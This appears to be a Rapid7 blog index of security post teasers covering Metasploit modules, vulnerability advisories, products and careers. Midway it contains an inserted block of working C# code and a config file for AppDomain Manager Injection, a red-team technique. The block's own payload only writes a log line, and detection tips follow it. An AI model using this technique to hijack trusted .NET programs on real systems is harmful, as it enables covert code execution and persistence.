Metasploit Weekly Wrap-Up
MOVEit It has been a busy few weeks in the security space; the MOVEit vulnerability filling our news feeds with dancing lemurs and a Barracuda vulnerability that has us all wondering how many shredders out there can handle a 1U appliance. Despite those very worthwhile distractions, Metasploit has...
OWASP TOP 10 API Security Risks: 2023!
The OWASP Top 10 API Security Risks 2023 has arrived! OWASP's API Top 10 is always a highly anticipated release and can be a key component of API security preparedness for the year. As we discussed in API Security Best Practices for a Changing Attack Surface, API usage continues to skyrocket. As ...
Detect and Prioritize Identity-Related Cloud Risk with InsightCloudSec
In modern cloud environments, roles and permissions are assigned not just to human users, but to machines, resources and services, as well. The massive scale of cloud environments leads to teams potentially managing millions of distinct identities. As a result, security teams often struggle to...
CVE-2023-2868: Total Compromise of Physical Barracuda ESG Appliances
Rapid7 incident response teams are investigating exploitation of physical Barracuda Networks Email Security Gateway (ESG) appliances dating back to at least November 2022. As of June 6, 2023, as part of an ongoing product incident response, Barracuda is urging ESG customers to immediately...
Velociraptor 0.6.9 Release: Digging Even Deeper with SMB Support, Azure Storage and Lockdown Server Mode
Carlos Canto contributed to this article. Rapid7 is very excited to announce version 0.6.9 of Velociraptor is now LIVE and available for download. Much of what went into this release was about expanding capabilities and improving workflows. We’ll now explore some of the interesting new features i...
Metasploit Weekly Wrap-Up
Cloud Fun With EC2 New ground was broken today with the addition of two PRs from community contributor sempervictus, also known as RageLtMan, who added the ability for Metasploit to establish sessions to EC2 instances using Amazon's SSM interface, which provides a public API to execute commands o...
This is Ceti Alpha Five!
Star Trek II: The Wrath of Khan demonstrating the very best and worst of cybersecurity in the 23rd Century For those new to the Sci-Fi game, Star Trek II: The Wrath of Khan is a 1982 science fiction film based on the 1966-69 television series Star Trek. In the film, Admiral James T. Kirk and the...
Metasploit Weekly Wrap-Up
AD CS certificate templates Our very own Spencer McIntyre has developed a new module that allows for creating, reading, updating and deleting certificate template objects from Active Directory. ESC4 Exploitation These changes notably enable the exploitation of the technique identified as ESC4...
Rapid7 Observed Exploitation of Critical MOVEit Transfer Vulnerability
Note: As of June 2, 2023, CVE-2023-34362 has been assigned to this vulnerability. On Friday, June 9, Progress Software released patches for a second vulnerability, CVE-2023-35036. On Thursday, June 15, a third vulnerability was announced and later assigned CVE-2023-35708. Progress has updates her...
Rapid7 Sales Director Devin Poulter On Building a Career as an Account Executive
Devin Poulter is a Sales Director with over 20 years of experience in the tech industry. Recently, we asked him a few questions to learn more about how he built his career, what it’s like to lead a team at Rapid7, and more. You’ve been in software sales for most of your career, what can you tell ...
Rapid7 Data Engineers Inspire Future Tech Talent at Summer Search Career Fest
We are thrilled to share some exciting news from our data engineering team at Rapid7. Earlier this month, our very own data engineers had the honor of being panelists at the technology panel organized by Summer Search, a fantastic organization that our CEO, Corey Thomas, is on the Leadership...
Widespread Exploitation of Zyxel Network Devices
Rapid7 is tracking reports of ongoing exploitation of CVE-2023-28771, a critical unauthenticated command injection vulnerability affecting multiple Zyxel networking devices. The vulnerability is present in the default configuration of vulnerable devices and is exploitable in the Wide Area Network...
Fetch Payloads: A Shorter Path from Command Injection to Metasploit Session
Over the last year, two-thirds of the exploit modules added to Metasploit Framework have targeted command injection vulnerabilities (CWE-94: Improper Control of Generation of Code). In the process of helping new and existing open-source contributors learn how to use Metasploit’s command stager...
Healthcare Orgs: Do You Need an Outsourced SOC?
Gartner predicts that 50% of organizations will partner with an external MDR (Managed Detection and Response) service by 2025 for around-the-clock monitoring. What determines where healthcare organizations fall on that 50/50 split over using an outsourced SOC? It usually comes down to their ability...
VeloCON 2023: Submissions Wanted!
Rapid7 is thrilled to announce that the 2nd annual VeloCON virtual summit will be held this September (date TBD), with times oriented to the continental USA time zones. Once again, the conference will be online and completely free! VeloCON is a one-day event focused on the Velociraptor community...
Casting a Light on Shadow IT in Cloud Environments
What is Shadow IT? The term “Shadow IT” refers to the use of systems, devices, software, applications, and services without explicit IT approval. This typically occurs when employees adopt consumer products to increase productivity or just make their lives easier. This type of Shadow IT can be...
Metasploit Weekly Wrap-Up
Fetch Based Payloads: Making the Path from Command Injection to Metasploit Session Shorter This week we’re releasing Metasploit fetch payloads. Fetch payloads are command-based payloads that leverage network-enabled applications on remote hosts and different protocol servers to serve, download, a...
Introducing: ‘Saved Filters’ in InsightCloudSec
Last year, when we launched Layered Context in InsightCloudSec, we knew we had something great on our hands. Not just because we provided a single view for cloud security practitioners to see their full cloud risk posture though, if we do say so ourselves, that’s pretty sweet. No, we knew we had...
Rapid7 Recognized as a Strong Performer in The Forrester Wave™ for MDR, Q2 2023
Rapid7 recognized amongst the top MDR providers in the industry. As security teams try to do more with less, addressing the sprawling attack surface and monitoring the escalating threat and risk landscape, it inherently leaves them at a disadvantage. Rapid7 Managed Threat Complete empowers...
CVE-2023-27350: Ongoing Exploitation of PaperCut Remote Code Execution Vulnerability
CVE-2023-27350 is an unauthenticated remote code execution vulnerability in PaperCut MF/NG print management software that allows attackers to bypass authentication and execute arbitrary code as SYSTEM on vulnerable targets. A patch is available for this vulnerability and should be applied on an...
Metasploit Wrap-up
Chaining for the win 1: Pentaho Business Server This week, our very own jheysel-r7 added an exploit module that leverages two vulnerabilities in Hitachi Vantara Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x. The module chains an authentication bypass...
[The Lost Bots] S03E03. The Rise of The Machines
Artificial Intelligence (AI) is both a profound topic and now, a practical one too: cybersecurity marketers in particular are loving the letters “A” and “I.” But exactly where a...
The Velociraptor 2023 Annual Community Survey
By Dr. Mike Cohen & Carlos Canto Velociraptor is an open-source project led and shaped by the community. Over the years, Velociraptor has become a real force in the field of DFIR, making it an obvious choice for many operational situations. Rapid7 is committed to continue making Velociraptor the...
Patch Tuesday - May 2023
A less crowded Patch Tuesday for May 2023: Microsoft is offering fixes for just 49 vulnerabilities this month. There are no fixes this month for printer drivers, DNS, or .NET, three components which have featured heavily in recent months. Three zero-day vulnerabilities are patched, alongside a...
Metasploit Weekly Wrap-Up
Throw another log file on the fire Our own Stephen Fewer authored a module targeting CVE-2023-26360 affecting ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier. The vulnerability allows multiple paths to code execution, but our module works by leveraging a...
AppDomain Manager Injection: New Techniques For Red Teams
AppDomain Manager Injection is a very versatile and useful technique for red team operators. This technique allows you to effectively turn any Microsoft .NET application on a Windows host into a lolbin (Living Off the Land Binary) by forcing the application to load a specially crafted .NET assembly,...
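The mechanism that post describes, shown as an added example that is not code from the Rapid7 article: a minimal AppDomainManager subclass compiled into a DLL, plus the configuration file that makes a .NET Framework executable load it before its own Main() runs. The assembly name, type name and log path (DomainHelper, DomainHelper.Manager, appdomain-injection.log) are hypothetical; the names in the .config must match the compiled assembly exactly. This applies to .NET Framework hosts; .NET Core and later do not honour these settings in the same way.

```csharp
// Added illustration of AppDomain Manager Injection (not from the original
// post). When a .NET Framework executable starts, the runtime reads
// <target>.exe.config (or the APPDOMAIN_MANAGER_ASM / APPDOMAIN_MANAGER_TYPE
// environment variables) and, if an AppDomainManager is named there, loads
// that assembly and instantiates the type before the target's entry point.
//
// Build:  csc /target:library /out:DomainHelper.dll DomainHelper.cs
// Deploy: copy DomainHelper.dll beside the target .NET executable and add a
// <target>.exe.config next to it with this content (hypothetical names):
//
//   <?xml version="1.0" encoding="utf-8"?>
//   <configuration>
//     <runtime>
//       <appDomainManagerAssembly value="DomainHelper, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
//       <appDomainManagerType value="DomainHelper.Manager" />
//     </runtime>
//   </configuration>
//
using System;
using System.Diagnostics;
using System.IO;

// The version must match the Version= in the .config display name.
[assembly: System.Reflection.AssemblyVersion("1.0.0.0")]

namespace DomainHelper
{
    // The runtime creates this type in the default AppDomain and calls
    // InitializeNewDomain before the host application's Main() executes.
    public sealed class Manager : AppDomainManager
    {
        public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
        {
            // Benign proof of execution: record which process loaded us.
            // An operator's payload would run here instead. For defenders,
            // this is the artefact to hunt: a signed Microsoft .NET binary
            // whose .config names an unsigned appDomainManagerAssembly.
            string note = string.Format(
                "[{0}] AppDomainManager loaded in {1} (PID {2})",
                DateTime.UtcNow.ToString("o"),
                AppDomain.CurrentDomain.FriendlyName,
                Process.GetCurrentProcess().Id);

            File.AppendAllText(
                Path.Combine(Path.GetTempPath(), "appdomain-injection.log"),
                note + Environment.NewLine);

            base.InitializeNewDomain(appDomainInfo);
        }
    }
}
```

On the defensive side, the same configuration surface is the detection: alert on newly written *.exe.config files containing an appDomainManagerAssembly element, and on .NET processes that load an assembly from the application directory that is not Microsoft-signed immediately after process start.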
Cloud Security Strategies for Manufacturing
Protecting production while supporting growing cloud initiatives The manufacturing industry is in limbo as organizations shift to cloud services. Many organizations are transitioning services to the cloud, but the vast majority maintain hybrid network environments that lean heavily on on-prem...
Three Takeaways from the Gartner® Market Guide for Managed Detection and Response Services
Not all MDR services are created equal, and in order for organizations to find the right partner for their managed detection and response needs, Gartner® has published a Market Guide report offering key insights for businesses of all sizes. At Rapid7, we are proud to offer this complimentary repo...
Metasploit Weekly Wrap-Up
Scanner That Pulls Sensitive Information From Joomla Installations This week's Metasploit release includes a module for CVE-2023-23752 by h00die. Did you know about the improper API access vulnerability in Joomla installations, specifically Joomla versions between 4.0.0 and 4.2.7, inclusive? This...
New InsightCloudSec Compliance Pack: Implementing and Enforcing ISO 27001:2022
James Alaniz and Diamond Fair contributed to this article. We’ve been on quite a roll lately releasing new compliance packs, along with iterative updates to others that we’ve supported for a while now. We’re not done yet, either! In this article, we’ll discuss our newly released compliance pack f...
Using Rapid7 Insight Agent and InsightVM Scan Assistant in Tandem
Background Rapid7 Insight Agent and InsightVM Scan Assistant are executables that can be deployed to assist in understanding the vulnerabilities in your environment. Frequently there are questions around when and where you would deploy each, if you need both, what they actually monitor, etc. This...
Starting a Career in Tech? Learn How Rapid7’s Emerging Talent Programmes Foster Long-Term Success
Rapid7’s Emerging Talent Programmes pave the way for early career professionals to have a successful career in tech. In Belfast, we offer both an Apprentice Programme and a Placement Programme to support new talent coming into the tech field. The Apprentice Programme is designed for individuals...
4 Takeaways from the 2023 Gartner® Market Guide for CNAPP
In an ongoing effort to help security organizations gain greater visibility into risk, we're pleased to offer this complimentary Gartner research, and share our 4 Takeaways from the 2023 Gartner® Market Guide for CNAPP. This critical research can help security leaders take an in-depth look into...
Metasploit Weekly Wrap-Up
VMware Workspace ONE Access exploit chain A new module contributed by jheysel-r7 exploits two vulnerabilities in VMware Workspace ONE Access to attain Remote Code Execution as the horizon user. The first is CVE-2022-22956, an authentication bypass, and the second is a JDBC injection in...
3 Key Challenges to Clarity in Threat Intelligence: 2023 Forrester Consulting Total Economic Impact™ Study
Inundated with data It would have been really cool to combine those two words to make “inundata,” but it would have been disastrous for SEO purposes. It’s all meant to kick off a conversation about the state of security organizations with regard to threat intelligence. There are several key...
Automating Qakbot Detection at Scale With Velociraptor
In this blog, you will learn a practical methodology to extract configuration data from recent Qakbot samples. I will provide some background on Qakbot, then walk through decode themes in an easy to visualize manner. Additionally, I'll share a Velociraptor artifact to detect and automate the deco...
Metasploit Weekly Wrap-Up
Rocket Software UniRPC Exploits Ron Bowes submitted two exploit modules for vulnerabilities he discovered in the UniRPC server for Rocket Software’s UniData product. The first exploit module, exploit/linux/misc/unidata_udadmin_auth_bypass, exploits an authentication bypass to ultimately gain remote...
Automating Qakbot decode at scale
This is a technical post covering practical methodology to extract configuration data from recent Qakbot samples. In this blog, I will provide some background on Qakbot, then walk through decode themes in an easy to visualize manner. I will then share a Velociraptor artifact to detect and automat...
Anarchy in the UK? Not Quite: A look at the cyber health of the FTSE 350
The attack surface of the United Kingdom's 350 largest publicly traded companies has—drum roll, please—improved. But it could be better. Those are the high level findings of the latest in Rapid7's looks at the cybersecurity health of companies tied to some of the globe's largest stock indices. Th...
Patch Tuesday - April 2023
Microsoft is offering fixes for 114 vulnerabilities for April 2023 Patch Tuesday. This month’s haul includes a single zero-day vulnerability, as well as seven critical Remote Code Execution (RCE) vulnerabilities. There is a strong focus on fixes for Windows OS this month. Zero-day vulnerability: CL...
7 Rapid Questions: Lindsey Searle
Welcome back to 7 Rapid Questions, our blog series where we ask passionate leaders at Rapid7 to give us an inside look at what it’s like to work on their team, and how they’re creating an impact every day. In this installment, we talk to Lindsey Searle, Senior Manager, Customer Advisors on how he...
Raptor Technologies Volunteer Management Client-Side Security Controls (FIXED)
Prior to Mar 18, 2023, due to a reliance on client-side controls, authorized users of Raptor Technologies Volunteer Management SaaS products could effectively enumerate authorized users, and could modify restricted and unrestricted fields in the accounts of other users associated with the same...
Rapid7 Podcast Explores Hybrid-First Workplace Learnings
As the world continues to navigate the post-pandemic shift in work environments, Rapid7 is operating on a hybrid-first approach that balances flexibility and productivity with collaboration and optimizing for customer success. In the spirit of cross-collaboration, the People Development and...
Metasploit Weekly Wrap-Up
The tide rolls in and out. The flood of new modules last week crested leaving ample time for documentation updates this week. The team and the community seem to have focused on getting those sweet sprinkles of information that help everyone understand Metasploit out to the world. Enhancements and...
[The Lost Bots] S03E02: Finding unknowns, even spy balloons
When a balloon crossed through Canada and the United States, everyone lost their minds. The news was all-balloon, all-the-time. And the big, obvious, serious...
Using InsightVM Remediation Projects To Ensure Accountability
One benefit of InsightVM reporting is that it enables security teams to build accountability into remediation projects. There are a number of ways this can be accomplished and the approach you take will be dictated by your organization’s specific structure and needs. In this blog, we’ll look at t...
Metasploit Weekly Wrap-up
Windows 11 AFD WinSock Priv Esc The new windows/local/cve_2023_21768_afd_lpe exploit makes use of a brand new Windows kernel exploitation technique that leverages the new I/O ring feature introduced in Windows 11 21H2. This technique comes from Yarden Shafir’s research and provides a full read/write...
What’s New in InsightVM and Nexpose: Q1 2023 in Review
In Q1, our team continued to focus on driving better customer outcomes with InsightVM and Nexpose by further improving efficiency and performance. While many of these updates are under the hood, you may have started to notice faster vulnerability checks available for the recent ETRs or an upgrade...
Velociraptor Version 0.6.8 Available Now
A New Client-Server Communication Protocol, VFS GUI, and More Performance Upgrades Make This The Fastest and Most Scalable Velociraptor Yet Rapid7 is excited to announce the release of version 0.6.8 of Velociraptor—an advanced, open-source digital forensics and incident response (DFIR) tool that...
Rapid7 Announces Partner of the Year Awards 2023 Winners
It’s with immense pleasure that we announce today the winners of the Rapid7 Partner of the Year Awards 2023. All our category winners have achieved exceptional growth—demonstrating their dedication to, and collaboration with, the Rapid7 Partner Program throughout the year. “We are incredibly...